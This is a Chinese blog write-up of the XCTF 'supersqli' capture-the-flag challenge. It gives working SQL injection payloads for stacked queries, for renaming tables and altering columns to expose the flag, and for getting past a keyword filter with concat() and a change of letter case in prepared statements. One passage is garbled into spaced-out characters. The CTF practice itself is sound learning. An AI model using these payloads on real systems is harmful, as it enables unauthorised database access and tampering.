XCTF-攻防世界CTF平台-Web类——14、supersqli(SQL注入、关键词过滤)

最新推荐文章于 2024-05-03 21:05:41 发布
置顶 最新推荐文章于 2024-05-03 21:05:41 发布
阅读量1.9k 收藏 5
点赞数 1
分类专栏: # Bugku、XCTF-WEB类写题过程 文章标签: 前端 php web安全 SQL注入 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/onlyone_1314/article/details/121583818
版权

目录标题

打开题目地址
在这里插入图片描述

之后搜索:1’ or 1=1#
在这里插入图片描述

成功返回了3条数据,说明存在SQL注入漏洞
之后先判断有几列数据,使用order by 1让返回的数据按照第一列排序:

1' or 1=1 order by 1 #

在这里插入图片描述

返回了正确的结果,并且按照第一列排序了,说明至少存在一列数据。
其实我们也可以直接从order by 2让返回的数据按照前2列排序开始的,因为再上面几次搜索的返回结果中,可以明显看到有2列以上的不同数据:
在这里插入图片描述

按照前两列排序也返回了正确的结果,说明至少存在2列数据。
之后我们使用order by 3让返回的数据按照前3列排序:

1' or 1=1 order by 3 #

在这里插入图片描述

没有第3列数据,
那我们接下来用union联合查询来利用这两列读取数据:

1' union all select 1,2 #

在这里插入图片描述

提示有关键词过滤:preg_match("/select|update|delete|drop|insert|where|\./i",$inject)
对一些关键的SQL语句的大小写的正则匹配,所以这里使用联合注入不可行,只能考虑其他不带这些SQL关键词的注入方式,如盲注、堆叠注入。

方法一、堆叠注入

使用堆叠注入可以同时执行多个SQL语句,例如分开执行显示所有数据库的语句:

1';show databases;#

在这里插入图片描述

还可以显示当前数据库中所有的表:

1';show tables;#

在这里插入图片描述

之后我们可以显示这两个表的列名,显示表1919810931114514的列名(数字为表名操作时要加反引号):

1';show columns from `1919810931114514`;#

在这里插入图片描述

1';show columns from words;#

在这里插入图片描述

可以看到每一列值的属性,但是show是无法直接查看值的内容的。
其中表1919810931114514中有一个属性的名称就是flag,应该就是flag所在的位置;表words的2列属性就是开始我们查询的时候输出的2列值。
所以现在的后台代码大概逻辑就是:

select * from words where id = $inject;

直接将我们输入的 i n j e c t 参 数 的 值 拼 接 到 S Q L 语 句 进 行 数 据 库 查 询 , 所 以 默 认 输 出 的 是 w o r d s 表 中 的 内 容 。 而 我 们 现 在 要 输 出 的 是 表 1919810931114514 中 的 f l a g 的 值 所 以 我 们 的 一 种 攻 击 思 路 就 是 : ( 1 ) 先 把 表 w o r d s 改 成 其 他 的 表 名 如 t e s t ; ( 2 ) 然 后 再 把 表 1919810931114514 重 命 名 为 w o r d s ; ( 3 ) 把 f l a g 字 段 改 为 i d 字 段 或 者 添 加 一 个 i d 字 段 。 这 样 我 们 输 入 的 inject参数的值拼接到SQL语句进行数据库查询,所以默认输出的是words表中的内容。而我们现在要输出的是表1919810931114514中的flag的值 所以我们的一种攻击思路就是: (1)先把表words改成其他的表名如test; (2)然后再把表1919810931114514重命名为words; (3)把flag字段改为id字段或者添加一个id字段。 这样我们输入的 injectSQLwords1919810931114514flag1wordstest21919810931114514words3flagididinject参数实际上查询的就是表1919810931114514中的数据。

1、rename修改表名和alter change修改列名

因为是可以使用堆叠注入,可以一次性完成上面3条语句,更改表表名用到的是rename,语法是:

rename tables 旧表名 to 新表名;

所以(1)把表words改成其他的表名如test:

rename tables `words` to `test`;

(2)然后再把表1919810931114514重命名为words:

rename tables `1919810931114514` to `words`;

修改列名用到的是alter change,语法是:

alter table 表名 change column 列名 新列名 属性

(3)把flag字段改为id字段:

 alter table `words` change column `flag` `id` varchar(100);

合起来的搜索语句就是:

1';rename tables `words` to `test`;rename tables `1919810931114514` to `words`; alter table `words` change column `flag` `id` varchar(100);#

在这里插入图片描述

执行之后没有报错。
再查看当前表中的所有数据:

1' or 1=1#

在这里插入图片描述

得到flag:flag{c168d583ed0d4d7196967b28cbd0b5e9}
我们再看一下我们刚刚的修改对数据库造成的影响:

1';show tables;#

在这里插入图片描述

现在数据库中的表是test和words了,另外原来的表1919810931114514中没有flag等于1的值所以搜索1现在没有符合要求的结果了:
在这里插入图片描述

也可以继续查看我们刚刚的修改对表test和words中的列造成的影响:

1';show columns from test;#

在这里插入图片描述

test表就是原words表中的内容。

1';show columns from words;#

在这里插入图片描述

words表就是原1919810931114514中的内容,且flag字段已经被我们改成了id字段。

2、rename修改表名和alter add添加列名

先重启一个容器,保证数据库中的数据都是没有被更改的。
在这里插入图片描述

这个攻击和上面不一样的只是攻击步骤(3)中是添加一个id字段,添加用的alter add,语法是:

alter table 表名 add (字段的名称 字段的类型 (附加属性));

(3)添加一个id字段,这句SQL语句的意思是在words表中添加一个id字段,它的类型是int(11)、primary key是主键、auto_increment)是值自动加1:

1;alter table `1919810931114514` add (id int(10) primary key auto_increment);#

和前面的语句合起来就是:

1';rename tables `words` to `test`;rename tables `1919810931114514` to `words`;alter table `words` add (id int(11) primary key auto_increment);#

在这里插入图片描述

执行成功,
因为有了自增加的id字段,所以直接搜索1,就是flag所在的数据:
在这里插入图片描述

得到flag:flag{c168d583ed0d4d7196967b28cbd0b5e9}
查看当前words表的列属性:

1';show columns from words;#

在这里插入图片描述

成功添加了id字段。

方法二、handler语句

mysql除可使用select查询表中的数据,也可使用handler语句,这条语句使我们能够一行一行的浏览一个表中的数据,不过handler语句并不具备select语句的所有功能。它是mysql专用的语句,并没有包含到SQL标准中。handler语句提供通往表的直接通道的存储引擎接口,可以用于MyISAM和InnoDB表。
后台只是过滤了select|update|delete|drop|insert|where关键字,没有过滤handler,尝试:

1' union handler words read first;#

在这里插入图片描述

但是这是一个MariaDB的数据库,无法使用handler关键字,所以这里是不可行的。

方法三、预编译

利用此方法的前提是支持多语句查询,也就是堆叠查询。
通常我们的一条sql在db接收到最终执行完毕返回可以分为下面三个过程:
(1)词法和语义解析
(2)优化sql语句,制定执行计划
(3)执行并返回结果
我们把这种普通语句称作Immediate Statements。
但是很多情况,我们的一条sql语句可能会反复执行,或者每次执行的时候只有个别的值不同(比如select、query的where子句值不同,update的set子句值不同,insert的values值不同)。如果每次都需要经过上面的词法语义解析、语句优化、制定执行计划等,则效率就明显不行了。
所谓预编译语句就是将这类语句中的值用占位符替代,可以视为将sql语句模板化或者说参数化,一般称这类语句叫Prepared Statements或者Parameterized Statements。
预编译语句的优势在于归纳为:一次编译、多次运行,省去了解析优化等过程;此外预编译语句能将输入的参数和SQL语句分隔开来,可以防止sql注入。
MySQL的预编译语法分为定义预编译SQL语句和执行预编译语句:
//预编译SQL语句

PREPARE stmt_name FROM preparable_stmt;

//执行预编译语句

EXECUTE stmt_name [USING @var_name [, @var_name]];

解释一下,定义的时候stmt_name是变量名,代表这个SQL语句,preparable_stmt代表的是预留的SQL语句中的参数位置,而下面举个例子:

PREPARE test FROMSELECT (? + ?);//即定义了一个两数相加的SQL预编译语句

执行时,@var_name即变量,可以带入语句中进行执行,如:

SET @a = 1,@b = 2;//给变量赋值
EXECUTE test USING @a,@b;//执行

就相当于执行了select (1+2);
这道题目主要就是利用预编译,可以利用concat()将关键词拆分成2个变量合并起来,来绕过过滤的正则表达式的匹配,也可以将整个语句使用char()处理后执行。
拆分开来就是:

-1;
set @sql = concat(‘sel’,‘ect * from 1919810931114514;);//定义一个@sql变量,在后台运行的时候使用concat将sel 和ect连接起来
prepare stmt from @sql;   //定义stmt变量指向预编译@sql语句
execute stmt; #   //执行stmt变量

合并起来一起运行就是:

1';set @sql = concat('sel','ect * from `1919810931114514`;');prepare stmt from @sql;execute stmt;#

在这里插入图片描述

但是后台还用strstr函数过滤了set和prepare关键字,但是strstr函数只能过滤了小写的"set"和"prepare"关键字,
我们都改成大写它就无法匹配了:

1';Set @sql = concat('sel','ect * from `1919810931114514`;');Prepare stmt from @sql;execute stmt;#

在这里插入图片描述

也能得到flag:flag{c168d583ed0d4d7196967b28cbd0b5e9}

大灬白
关注
  • 1
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
XCTF-RE】新手练习区-Hello, CTF.exe
08-03
题目:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/gisa2b
CTF---Web---SQL注入---03---联合注入+关键字过滤
qq_22160557的博客
07-29 758
文章目录前言一、题目描述二、解题步骤1、回显判断注入方式2、尝试列数3、寻找注入点4、尝试注入(库,表,列,字段)三、总结 前言 题目分CTFWebSQL注入—03—联合注入+关键字过滤 一、题目描述 题目:SQL注入 链接:http://192.168.87.175 二、解题步骤 1、回显判断注入方式 Step1: http://192.168.87.175/viewld.do?ldid=2,回显正常。有内容 Step2: http://192.168.87.175/viewld.do?ld
supersqli-攻防世界
szhangliwenya的博客
03-30 1089
因为 H 对应 ASCII 码值为 72,e 对应 ASCII 码值为 101,l 对应 ASCII 码值为 108,o 对应 ASCII 码值为 111。根据提交方式:POST注入,GET注入,HTTP HEAD注入。根据有无回显:联合注入,报错注入,布尔盲注,延时注入。1' and 1=1 #没报错判断为单引号字符注入。其他注入:堆叠注入,宽字节注入,二次注入等。1' order by 3#报错。
攻防世界XCTFsupersqli
末初的CSDN博客
03-13 2323
加个单引号发现报错 比较烦的就是过滤了select 这样就无法进行查数据了,而且这里的/i就是忽略了大小写。无法进行大小写过滤 首先可以通过报错函数,把数据库给注入出来 -1' and extractvalue(1,concat(1,version()))-- + 版本信息:.18-MariaDB 数据库名称:supersqli 然后经过测试发现这里可以执行多条语句,也就是堆叠注入...
攻防世界supersqli-强网杯随便注(堆叠注入顶级练手题目)
yuanxu8877的博客
11-28 785
攻防世界supersqli-强网杯随便注(堆叠注入顶级练手题目)
XCTF 攻防世界WEB 高手进阶区 supersqli(三种方法)
weixin_45844670的博客
08-27 639
这道题有多种方法方法一(堆叠注入+rename&alter)方法二(handler)方法三(预编译) 方法一(堆叠注入+rename&alter) 就是可以堆一堆sql注入进行注入,这个时候我们就不受前面语句的限制可以为所欲为了。其原理也很简单,就是将原来的语句构造完后加上分号,代表该语句结束,后面在输入的就是一个全新的sql语句了,这个时候我们使用增删查改毫无限制。 相关知识补充: https://www.jianshu.com/p/c50ced83414d https://blog.cs
攻防世界——supersqli
weixin_62281892的博客
09-18 1747
PHP preg_replace() 正则替换,与Javascript 正则替换不同,PHP preg_replace() 默认就是替换所有符号匹配条件的元素。到这里我们的表列名就已经修改完毕,此时还会输出修改完成的words列名,最后通过万能钥匙1' or '1'='1即可得到输出。由于注入框的查询是对列id的搜索,此时参考两个表的列名,需要将flag列名改为能够查找的id列(修改包括名称和数据型)。上网冲浪了解了一波,好像是似黑名单,这些词会被替换,那没办法了,我们就用堆叠注入。
攻防世界-supersqli
weixin_43960066的博客
03-27 362
由于没有对alter,rename做出过滤,将1919810931114514修改为words,将flag修改为id,同时将words修改为其他的,将id也修改为其他的。由于过滤了一些关键字,所以想要得到flag可采取预编译、修改flag的名字为id修改1919810931114514为words(即可在搜索框中直接输入即可)发现flag在数字表中,同时判断当前正在使用的就是supersqli这个数据库,输入框中输入1就是查询的word表。想要得到flag需要使用的语句为。使用堆叠注入,查看数据库
攻防世界supersqli
qq_45955869的博客
05-27 206
提示:攻防世界supersqli。
攻防世界-web-supersqli
wuh2333的博客
06-07 879
我们看到,服务端默认的查询语句查询出两个字段,说明查询的是words表,我们将表1919810931114514的名字改成words并且将flag字段改为id字段不就行了吗?这里尝试按照基本思路进行验证,先确定注入点,然后通过union查询依次确认数据库名,表名,字段名,最终获取到我们想要的字段信息。博客里提到的一种预编译绕过的方式可以让我们绕过waf的限制使用select语句,处理起来较为复杂,这里就不详细说明了。使用 or 永真修改查询条件可以将所有信息查询出来,因此这里肯定是存在sql注入的。
XCTF-Mobile】新手练习区-12.rar
09-01
题目:https://adworld.xctf.org.cn/task/answer?type=mobile&number=6&grade=0&id=5095&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/ctf/hackermind
XCTF-Mobile】新手练习区-02-easy-dex.apk
08-16
题目:https://adworld.xctf.org.cn/task/answer?type=mobile&number=6&grade=0&id=5089&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/easydex
XCTF-RE】新手练习区-simple-unpack
08-03
题目:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/ld1cw8
XCTF-Mobile】新手练习区-04-easyjava.apk
08-04
题目:https://adworld.xctf.org.cn/task/task_list?type=mobile&number=6&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/easyjava
element-ui的bug记录
nick_zhang的博客
04-29 490
7.el-dialog组件在关闭时,会触发子组件的created/mounted生命周期。原因是当visible改变为false,即关闭dialog的时候,如果用户设置了destroyOnClose=true,则执行key++;key是绑定在较外层的div上的,key值的变化会导致这个div重新渲染。6.select 的 popper-append-to-body ,默认值为true;dialog的append-to-body,默认值为false;3.element表格前端分页。
WebCTFSHOW 中期测评刷题记录(1)
uuzeray的博客
05-02 1379
访问./cache/6a992d5529f459a44fee58c733255e86.php,命令执行拿flag。login.php是在./templates下的,而./flag.php与./templates均为web目录。注意到用./template/error.php中存在{{username}},可以用其cache来写马。这时候重开下靶机再去读./templates/index.php,发现是给了提示的。访问./config/settings.php,命令执行拿到flag。
50个前端实战项目之04:隐藏的搜索小组件
最新发布
前端开发博客
05-03 882
大家好,我是宝哥。今天讲50个前端实战项目之04:隐藏的搜索小组件。源码下载地址https://github.com/bradtraversy/50projects50days/tree/master/hidden-search前端实战项目系列正在更新:04/5001:可展开卡片02:进度条03:旋转导航动画04:隐藏的搜索小组件项目介绍本项目演示了一个简洁实用的隐藏式搜索小部件。点击搜索按钮后,...
判断前端入参是否空否则提示前端写法
qq_39306234的博客
04-28 295
前端先声明一个变量,用于alert判断。在templeat中定义一个提示语句。然后在点击事件时判断一下是否展示。
xctf supersqli
09-01
对于 xctf supersqli,它是一个供参与者练习 SQL 注入技巧的 CTF(Capture The Flag)比赛题目。CTF比赛是一种网络安全竞赛,旨在测试参与者在各种安全领域的技能。在 xctf supersqli 中,参与者需要利用 SQL 注入漏洞来获取敏感数据或者执行非授权操作。这个题目可以帮助参与者提升对于 SQL 注入漏洞的理解和防御能力。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值